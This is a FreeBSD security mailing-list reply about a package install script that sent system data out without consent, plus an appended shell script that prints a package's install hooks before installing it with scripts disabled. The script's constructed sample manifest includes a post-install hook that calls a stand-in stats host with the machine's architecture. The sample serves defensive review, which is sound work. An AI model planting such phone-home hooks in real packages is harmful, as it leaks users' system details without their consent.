Date:      Wed, 7 Apr 2021 20:37:23 -0700
From:      Gordon Tetlow <gordon@tetlows.org>
To:        Stefan Blachmann <sblachmann@gmail.com>
Cc:        Shawn Webb <shawn.webb@hardenedbsd.org>, Miroslav Lachman <000.fbsd@quip.cz>, FreeBSD Security Team <secteam@freebsd.org>, Ed Maste <emaste@freebsd.org>, FreeBSD-security@freebsd.org, cperciva@freebsd.org
Subject:   Re: Security leak: Public disclosure of user data without their consent by installing software via pkg
Message-ID:  <DE5BE925-0F4F-4312-9788-20E19BA2CD47@tetlows.org>
In-Reply-To: <CACc-My2PMzaiwqZUnTEhzKY5U3n0GzjOXMmsgPEVjf5Zyn4F4w@mail.gmail.com>
References:  <CACc-My1b32PLyeOU4hMDCBGaVzU1GLSrgAft95zMb5U7p7eRwQ@mail.gmail.com> <20210406142735.nbearpqiqz3wyrmd@mutt-hbsd> <6fcb2d1a-929e-c1fe-0273-42858ec547ec@quip.cz> <20210406144222.gbgjcc7jsozsl2m2@mutt-hbsd> <410E4486-F9CF-41C3-9396-BD307AF2325F@tetlows.org> <CACc-My2PMzaiwqZUnTEhzKY5U3n0GzjOXMmsgPEVjf5Zyn4F4w@mail.gmail.com>


> On Apr 7, 2021, at 7:50 PM, Stefan Blachmann <sblachmann@gmail.com> wrote:
> 
<snip>
> Anything else is apparently deemed “allowed”.
> Spying out the machine and its configuration, sending that data to an
> external entity – perfectly OK. Not a problem at all.
> 
> This has been proved by the handling of this last BSDstats security
> incident, where the FreeBSD “pkg” utility is being abused to run
> spyware without the users’ pre-knowledge and without their consent.
> 
> This abuse is apparently being considered acceptable by both FreeBSD
> and HardenedBSD security officers.
> Instead of taking action, you "security officers" tell the FreeBSD
> users that it is their own guilt that they got “pwnd”.
> Just because they trustingly installed software from the package repo
> hosted by FreeBSD, without religiously-carefully auditing each and
> every package's pre- and postinstallation script before actual install,
> using the “pkg -I” option.

I do not consider it acceptable that this behavior is occurring. I'll
quote to you what I said in my private email to you:

Running scripts at pre/post-install is a foundational design of
packages. These scripts can do anything a shell script can do. If you
are concerned about packages running scripts, I recommend changing the
pkg setting:

     RUN_SCRIPTS: boolean
                 Run pre-/post-installation action scripts.  Default: YES.

Change this in your /usr/local/etc/pkg.conf and you will not have
pre/post install scripts running for your packages.

Another option, instead of changing the global default, is to use the
pkg install -I switch, which will not run scripts for that installation.

As for the behavior of this specific package, I agree it is poor that it
runs without user consent. Reading the pkg-install script, it appears it
should ask consent; perhaps it is broken. I recommend taking it up with
the port/package maintainer, scrappy@hub.org, whom I have added to this
email.

I agree this should be fixed and is undesirable. Even the pkg maintainer,
who is the person running the bsdstats website, is in agreement here. The
difference is: I don't assume the maintainer has ill will, and it is the
result of an oversight that will be fixed. There is a process to be
followed and I am not comfortable wielding the security-officer hammer
unless I see visible evidence the process is broken and requires me to
intercede. We aren't there.

<snip>
> Can it be ethically acceptable to put users at risk, for example by
> intentionally (?) not setting any limits to what extent installer
> scripts are allowed to collect sensitive user and system data and
> disclose them to interested third parties?

This is an interesting point. Unfortunately, the technology we have
gives unfettered access to the system. I'm having a hard time thinking
how we could achieve the goal of installing software (which in our model
requires root privileges) while also limiting what it is allowed to do
on said system. I'm not aware of any other package system (rpm, deb,
etc) that has technical limits on pre/post installation scripts. If you
are aware of any examples, I'd love to see it to see if there is
something we can incorporate. Patches, as always, are welcome to improve
the system.

> This should imho be discussed in public, leading to the formulation of
> rules which might help enabling users to trust FreeBSD.
> 
> [ Just to note: the porter of the package in question wrote me that it
> never was the intention to run the scripts without user consent. There
> must have happened something/some action by someone, which led to this
> behaviour. What actually happened, this can be analyzed.
> For me, what actually matters is not this particular incident, but the
> finding that spyware behavior of pre/postinstaller scripts is
> apparently generally deemed acceptable and not actionable, according
> to FreeBSD rules. So the problem are these rules, and not this last
> incident. ]

I disagree with your premise. For the record, I did take action, which
was to escalate the problem to the port/pkg maintainer. It is their
software and their responsibility. Please do not take my unwillingness
to violate the maintainer's ownership of their port/pkg as unwillingness
to deal with the issue. I would like the process to have a chance to
work.

Lastly, your combative tone in reporting this issue is far from anything
I would consider professional. I would ask that you give some
consideration to your words in the hopes that you will understand that
flaming me on the mailing list is unlikely to make me want to advocate
for you.

Thanks,
Gordon
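The message above gives two knobs (RUN_SCRIPTS in pkg.conf and pkg install -I) but no way to see what a package's scripts would do before deciding. The script below is an added example, not code from this thread, from FreeBSD or from the bsdstats port: it fetches a package without installing it, pulls the scripts section out of the raw manifest, and only then installs with -I. Assumptions not stated in the e-mail: pkg fetch -o, pkg info -R -F and pkg install -I behave as in the pkg(8) man pages; "pkg info -R" prints multi-line scripts as <<EOD heredocs (assumed layout; the parser also accepts single-line quoted strings); the sample manifest is constructed and names no real package or host.

```shell
#!/bin/sh
# Added example, not from the thread or from FreeBSD: review a package's
# pre/post-install hooks before pkg runs them as root, then install with
# scripts disabled. Assumptions: pkg fetch -o, pkg info -R -F and
# pkg install -I behave as in pkg(8); "pkg info -R" prints multi-line
# scripts as <<EOD heredocs (assumed layout); the sample manifest below is
# constructed and names no real package.
set -eu

# Print the scripts: { ... } block of a raw manifest ("pkg info -R" style).
# With mode=hooks print only the hook names (pre-install, post-install, ...).
# A heredoc body may itself contain a "}" line, so heredoc state is tracked
# separately from the block's closing brace.
manifest_scripts() {
    awk -v mode="${2:-body}" '
        !inblk && /^scripts:[[:space:]]*\{/ { inblk = 1; next }
        !inblk                                { next }
        inhere { if (mode == "body") print; if ($0 == "EOD") inhere = 0; next }
        /^[[:space:]]*\}/                     { exit }
        /<<EOD[[:space:]]*$/                  { inhere = 1 }
        mode == "hooks" { sub(/^[[:space:]]*/, ""); sub(/:.*/, ""); print; next }
        { print }
    ' "$1"
}

# Exit 0 when the manifest carries at least one install/deinstall hook.
has_install_scripts() {
    [ -n "$(manifest_scripts "$1" hooks)" ]
}

# Constructed sample manifest (not a real package): one single-line hook and
# one heredoc hook that ships host details to an external server, the kind
# of behaviour the thread is about.
write_sample_manifest() {
    cat > "$1" <<'MANIFEST'
name: "examplepkg"
origin: "sysutils/examplepkg"
version: "1.0"
comment: "constructed sample, not a real package"
scripts: {
    pre-install: "#!/bin/sh\npw groupshow examplesvc >/dev/null 2>&1 || pw groupadd examplesvc"
    post-install: <<EOD
#!/bin/sh
# phones home with host details; this is what the reviewer wants to catch
fetch -q -o /dev/null "https://stats.example.invalid/report?arch=$(uname -m)"
EOD
}
annotations: {
    repository: "FreeBSD"
}
MANIFEST
}

# On a FreeBSD host with pkg(8): fetch without installing, show the hooks,
# and install with -I (no scripts) only after the reviewer says yes.
# Global equivalent of -I: RUN_SCRIPTS = false; in /usr/local/etc/pkg.conf.
review_then_install() {
    pkgname=$1
    workdir=$(mktemp -d)
    pkg fetch -y -o "$workdir" "$pkgname"
    for archive in "$workdir"/All/*; do
        pkg info -R -F "$archive" > "$workdir/manifest"
        if has_install_scripts "$workdir/manifest"; then
            printf '%s hooks: %s\n' "$archive" \
                "$(manifest_scripts "$workdir/manifest" hooks | tr '\n' ' ')"
            manifest_scripts "$workdir/manifest"
        else
            printf '%s: no install scripts\n' "$archive"
        fi
    done
    printf 'Install %s with scripts disabled (pkg install -I)? [y/N] ' "$pkgname"
    read -r answer
    if [ "$answer" = y ]; then
        pkg install -y -I "$pkgname"
    fi
}

# Usage: sh review-pkg.sh <package>. Without an argument (or without pkg),
# just exercise the parser on the constructed sample.
if [ -n "${1:-}" ] && command -v pkg >/dev/null 2>&1; then
    review_then_install "$1"
else
    sample=$(mktemp)
    write_sample_manifest "$sample"
    printf 'hooks: %s\n' "$(manifest_scripts "$sample" hooks | tr '\n' ' ')"
    manifest_scripts "$sample"
    rm -f "$sample"
fi
```

One caveat that belongs next to -I and RUN_SCRIPTS=false: skipping the scripts also skips legitimate setup they perform (creating service users and groups, enabling rc hooks), so a package installed that way may not work until those steps are done by hand. Reviewing the scripts first, as above, tells you which steps those are.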



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?DE5BE925-0F4F-4312-9788-20E19BA2CD47>